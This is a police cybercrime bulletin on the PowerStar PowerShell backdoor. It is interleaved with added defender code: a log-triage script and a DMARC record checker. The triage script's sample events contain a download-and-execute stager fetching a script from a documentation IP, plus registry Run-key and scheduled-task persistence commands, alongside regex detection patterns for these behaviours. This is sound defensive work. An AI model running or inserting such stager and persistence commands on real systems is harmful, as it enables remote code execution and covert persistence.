
Republic of the Philippines
National Police Commission
PHILIPPINE NATIONAL POLICE
ANTI-CYBERCRIME GROUP
Camp BGen Rafael T Crame, Quezon City

ACG-CYBER SECURITY BULLETIN NR 305: Charming Kitten’s PowerStar Backdoor Malware Evolves with Advanced Techniques

Reference Number ACG-CSB 072723305

The following information was obtained from different cyber security sources for notification to all parties concerned, pursuant to the mandate of the Philippine National Police Anti-Cybercrime Group (PNP ACG). It is classified as "Restricted" pursuant to PNP Regulation 200-012 on Document Security, and its Impact Rating is High based on the PNP Information and Communication Technology (ICT) Security Manual s.2010-01, p. 22 and p. 129.

SUMMARY

In recent years, Iranian hackers have become increasingly sophisticated in their cyber-attacks. One of the most dangerous tools in their arsenal is the PowerStar backdoor. This malware is designed to infiltrate critical infrastructure systems and steal sensitive data.

The latest version of the malware shows that Charming Kitten (an Iranian state-aligned threat actor also tracked as APT35 and Phosphorus) keeps refining its tradecraft to remain undetected. It highlights the need for stringent cybersecurity measures to counter these sophisticated threats.

The PowerStar backdoor is a PowerShell-based Remote Access Trojan (RAT) that gives an attacker unauthorized access to a compromised system and the ability to steal sensitive data. It is typically delivered through spear-phishing emails or by exploiting software vulnerabilities. Once it infects a system, it opens a backdoor through which the attacker remotely controls the host, exfiltrates data, installs additional malware, or uses the system to launch further attacks.

The new PowerStar variant adds features such as remote execution of PowerShell and C# commands, persistence through several different methods, dynamic configuration updates, multiple Command and Control (C2) channels, system reconnaissance, and monitoring of its own existing persistence mechanisms.

PowerStar is built to be stealthy and hard to detect. It uses several techniques to evade detection, including encrypting its communications, anti-debugging checks, and hiding its files and processes. As noted above, delivery is typically through emails carrying a malicious attachment or link; when the user opens the attachment or follows the link, the malware is downloaded and installed on the system.
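To make the behaviours listed in the two paragraphs above concrete from the defender's side, the following is an added example (not code from this bulletin, from Charming Kitten, or from any vendor report) that triages Windows PowerShell script block log entries (Event ID 4104) for the traits just described: an encoded stager that downloads and runs a remote script, in-memory C# via Add-Type, registry Run key and scheduled task persistence, and beaconing to a raw IP address. The five log entries, the indicator names, the weights and the alert threshold are all constructed for illustration and are not PowerStar signatures.

```python
"""Triage PowerShell script block log entries (Event ID 4104) for backdoor-like
behaviour. Added illustration: the events, indicator names, weights and the
threshold below are constructed, not PowerStar signatures or real telemetry."""
import base64
import re

# powershell.exe -EncodedCommand takes base64 of the UTF-16LE script text.
ENCODED_RE = re.compile(r"(?i)-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})")

# Each indicator corresponds to one behaviour described in the bulletin.
INDICATORS = {
    "encoded_command": ENCODED_RE,
    "download_and_execute": re.compile(
        r"(?i)\b(?:iex|invoke-expression)\b.*?(?:downloadstring|invoke-webrequest|net\.webclient)"
        r"|(?:downloadstring|invoke-webrequest|net\.webclient).*?\|\s*(?:iex|invoke-expression)\b"),
    "csharp_in_memory": re.compile(r"(?i)add-type\s+.*?-typedefinition"),
    "run_key_persistence": re.compile(r"(?i)currentversion\\run\b"),
    "scheduled_task_persistence": re.compile(r"(?i)register-scheduledtask|schtasks(?:\.exe)?\s+/create"),
    "wmi_subscription_persistence": re.compile(r"(?i)__eventfilter|commandlineeventconsumer"),
    "raw_ip_url": re.compile(r"(?i)https?://(?:\d{1,3}\.){3}\d{1,3}"),
    "hidden_or_bypass": re.compile(r"(?i)-w(?:indowstyle)?\s+hidden|-e(?:p|x|xec|xecutionpolicy)\s+bypass"),
}

# Constructed weights: persistence and remote code execution weigh most.
WEIGHTS = {
    "encoded_command": 2, "download_and_execute": 3, "csharp_in_memory": 2,
    "run_key_persistence": 3, "scheduled_task_persistence": 3,
    "wmi_subscription_persistence": 3, "raw_ip_url": 2, "hidden_or_bypass": 1,
}
ALERT_THRESHOLD = 4


def encode_for_powershell(script: str) -> str:
    """Build the base64 form that powershell.exe -EncodedCommand expects."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(block: str):
    """Recover the script hidden behind -EncodedCommand, or None if absent/invalid."""
    m = ENCODED_RE.search(block)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def scan_script_block(block: str) -> set:
    """Return the indicator names matched by one script block, including matches
    that only appear after decoding an -EncodedCommand payload."""
    hits = {name for name, rx in INDICATORS.items() if rx.search(block)}
    decoded = decode_encoded_command(block)
    if decoded is not None:
        hits |= {name for name, rx in INDICATORS.items() if rx.search(decoded)}
    return hits


def risk_score(hits) -> int:
    return sum(WEIGHTS[h] for h in hits)


def triage(events, threshold=ALERT_THRESHOLD):
    """Return (record_id, score, sorted indicators) for events at or above threshold."""
    findings = []
    for record_id, block in events:
        hits = scan_script_block(block)
        score = risk_score(hits)
        if score >= threshold:
            findings.append((record_id, score, sorted(hits)))
    return findings


# Constructed 4104 script block texts (record id, ScriptBlockText). 203.0.113.10
# is a documentation address; none of these are real PowerStar artefacts.
SAMPLE_EVENTS = [
    (1, r"Get-ChildItem C:\Users\alice\Documents | Sort-Object LastWriteTime"),
    (2, "powershell.exe -nop -w hidden -EncodedCommand " + encode_for_powershell(
        "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/stage.ps1')")),
    (3, r"Set-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' "
        r"-Name 'Updater' -Value 'powershell -ep bypass -File C:\Users\Public\u.ps1'"),
    (4, r"Add-Type -TypeDefinition $source; Register-ScheduledTask -TaskName 'SysCheck' "
        r"-Action $action -Trigger $trigger"),
    (5, r"Invoke-WebRequest -Uri https://www.example.com/report.csv -OutFile C:\temp\report.csv"),
]

if __name__ == "__main__":
    for record_id, score, hits in triage(SAMPLE_EVENTS):
        print(f"record {record_id}: score {score}: {', '.join(hits)}")
```

Record 2 is the interesting case: on its own the encoded command matches only the hidden-window and encoded-command indicators, and it is the UTF-16LE decode that exposes the download-and-execute stager and the raw IP C2 address. Record 5 shows that an ordinary Invoke-WebRequest without a pipe into IEX scores zero, which keeps the rule from firing on routine administration. Script block logging must be enabled (Turn on PowerShell Script Block Logging in Group Policy) for these events to exist at all.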

Iranian hackers have reportedly used PowerStar against critical infrastructure, including the energy, water, and transportation sectors. One of the sources cited below describes an attack in which Iranian hackers used PowerStar to reach a water treatment plant in Israel, gaining access to the plant's control systems and manipulating the treatment process; that attack was detected before any damage was done.

In conclusion, the PowerStar backdoor is a dangerous tool being used by Iranian hackers against critical infrastructure. Because it is designed to be stealthy and hard to detect, it poses a serious threat to organizations that depend on such systems. To protect against it, secure your systems: keep software up to date, use strong, unique passwords together with multi-factor authentication, and train employees to recognize and avoid phishing attacks. These steps reduce the risk of falling victim to a cyber-attack and keep sensitive data safe.

RECOMMENDATION

The public is advised to follow these tips to reduce the risk posed by Charming Kitten's PowerStar backdoor malware:

  • Run Regular Malware Scans;
  • Filter Your Email and Implement Anti-Phishing Protection;
  • Keep Your Systems Up-To-Date With the Latest Security Patches;
  • Encrypt Any Sensitive Company Information You Have;
  • Enable Multi-Factor Authentication (MFA);
  • Use Domain-based Message Authentication, Reporting & Conformance (DMARC) Technology;
  • Run Frequent Backups;
  • Conduct Email Security Training for Employees; and
  • Be Wary of Suspicious Emails.
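The list above names DMARC but not what a usable record looks like, and a record that merely exists does not stop spoofed spear-phishing mail. The following is an added example (not part of the bulletin) that parses a DMARC TXT record and reports the settings that leave a domain unenforced; the weak and strengthened records and the example.com reporting address are constructed.

```python
"""Check whether a DMARC TXT record actually enforces a policy.
Added illustration; the two sample records below are constructed for example.com."""

# Published at _dmarc.example.com. Many domains stop here: the record exists,
# but p=none only asks receivers to monitor, and pct=20 samples a fifth of mail.
WEAK_RECORD = "v=DMARC1; p=none; pct=20"

# The same domain after tightening: reject unaligned mail for the domain and its
# subdomains, apply to all mail, use strict alignment, and receive aggregate reports.
STRONG_RECORD = ("v=DMARC1; p=reject; sp=reject; adkim=s; aspf=s; pct=100; "
                 "rua=mailto:dmarc-reports@example.com")


def parse_dmarc(record: str) -> dict:
    """Split 'tag=value; tag=value' into a dict and enforce the RFC 7489 basics:
    v=DMARC1 must be the first tag with that exact value, and p= is required."""
    parts = [p.strip() for p in record.split(";") if p.strip()]
    tags = {}
    for part in parts:
        if "=" not in part:
            raise ValueError(f"malformed tag: {part!r}")
        key, value = part.split("=", 1)
        tags[key.strip().lower()] = value.strip()
    if not parts or parts[0].split("=", 1)[0].strip().lower() != "v" or tags.get("v") != "DMARC1":
        raise ValueError("not a DMARC record: v=DMARC1 must be the first tag")
    if "p" not in tags:
        raise ValueError("missing required p= tag")
    return tags


def assess_dmarc(record: str) -> list:
    """Return human-readable weaknesses; an empty list means the record enforces."""
    tags = parse_dmarc(record)
    issues = []
    policy = tags["p"].lower()
    if policy == "none":
        issues.append("p=none: monitoring only, spoofed mail is still delivered")
    elif policy not in ("quarantine", "reject"):
        issues.append(f"unknown policy {policy!r}")
    pct = tags.get("pct", "100")          # RFC default is 100
    if not pct.isdigit() or not 0 <= int(pct) <= 100:
        issues.append(f"pct={pct!r} is not a valid percentage")
    elif int(pct) < 100:
        issues.append(f"pct={pct}: policy applied to only {pct}% of failing mail")
    subdomain_policy = tags.get("sp", policy).lower()   # sp defaults to p
    if subdomain_policy == "none" and policy != "none":
        issues.append("sp=none: subdomains can still be spoofed")
    if "rua" not in tags:
        issues.append("no rua= address: no aggregate reports, so spoofing attempts stay invisible")
    return issues


if __name__ == "__main__":
    for label, record in (("weak", WEAK_RECORD), ("strong", STRONG_RECORD)):
        print(label, record)
        for issue in assess_dmarc(record) or ["enforcing, no issues found"]:
            print("  -", issue)
```

Run against the weak record the checker reports three problems (monitoring-only policy, partial percentage, no reporting address); the strengthened record reports none. A reject policy is only safe to publish once SPF and DKIM are correctly set up for every legitimate sender, which is exactly what the aggregate reports from rua= are for.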

For additional information, please refer to the following websites:

  • https://cyberpedia.medium.com/powerstar-backdoor-how-iranian-hackers-are-using-this-malware-to-target-critical-infrastructure-ad5178da58fe
  • https://heimdalsecurity.com/blog/charming-kittens-powerstar-malware-boosts-its-techniques/
  • https://www.msp360.com/resources/blog/spear-phishing-prevention/

POINT OF CONTACT

Please contact PMAJ LESLIE P JALLORINA, Police Community Relations Officer, by e-mail or by telephone at (632) 723-0401 local 7483 for any inquiries related to this CYBER SECURITY BULLETIN.